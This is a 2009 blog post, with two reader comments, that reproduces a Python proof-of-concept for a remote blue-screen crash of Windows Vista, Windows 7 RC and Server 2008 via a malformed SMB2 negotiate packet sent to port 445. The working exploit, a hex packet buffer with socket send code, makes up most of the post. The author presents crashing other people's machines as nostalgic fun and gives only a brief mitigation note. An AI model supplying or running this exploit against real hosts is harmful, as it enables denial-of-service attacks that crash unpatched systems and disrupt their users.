Good times again with Remote BSOD

Posted in September 9, 2009 ¬ 00:48h.Justin Lee2 Comments »

Remember the good old days when you’re able to teardrop someone who was on Windows 3.1, Windows 95 or Windows NT and send a BSOD to their computer? Well, I do. Now, for the limited time offer only, we are able to relive this experience once again until Microsoft releases a security patch. This affects all Windows Vista, Windows 7, and possibly Windows Server 2008 and Windows Server 2008 R2. Let’s hope they do release a security patch before Windows 7 officially launches.

Here’s the proof of concept. I’m going to keep a copy here just in case.

Smb-Bsod.py:

#!/usr/bin/python # When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a # PAGE_FAULT_IN_NONPAGED_AREA from socket import socket from time import sleep

host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00"

) s = socket()

s.connect(host) s.send(buff) s.close()

To stop your computer from BSOD for now, try disabling SMB 2.0. We might even see some script kiddie come up with a simple teardrop application to BSOD your computer.

Ah! The good old days again.

== Update ==

Windows 7 RTM and Windows Server 2008 R2 are already patched and fixed. This exploit only works on Windows Vista and Windows Server 2008, and Windows 7 RC.

Original Post: Microsoft Security Advisory 975497 Released

== End Update ==

Original Post: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

Share and Enjoy:

SecurityBSOD, microsoft, SMB 2.0, teardrop, Windows, Windows 3.1, Windows 7, Windows 95, Windows NT, Windows Server 2008, Windows Server 2008 R2, Windows Vista

You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

2 Comments »

Hongster says:

September 14, 2009 at 16:25

The code does not work. The author has forgotten to add:
from socket import socket
Importing sleep is redundant, as it is not used in the code. I have made some minor changes and published it on http://bit.ly/Zf7P5.

Unfortunately, I do not have a Vista/7 machine to try out the code. Have you tried it yet?
G says:

November 11, 2009 at 23:47

@Hongster: No, the author didn’t forget to add
from socket import socket
Probably Justin missed out copying that line from the original article here.
http://seclists.org/fulldisclosure/2009/Sep/39

As for the sleep, it was used during his fuzzing as i feel he don’t wanna flood it.

The code does work.

@Justin: There is another SMB bug in Win 7 and Win 2008 R2 discussed here.
http://seclists.org/fulldisclosure/2009/Nov/134

Have Fun.

S	M	T	W	T	F	S
« Aug				Oct »
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30

Good times again with Remote BSOD

2 Comments »

Leave a Reply

Calendar

Facebook

Networked Blogs

Recent Posts

Recent Comments

Categories

Archives

Social

Tech65

Spam Blocked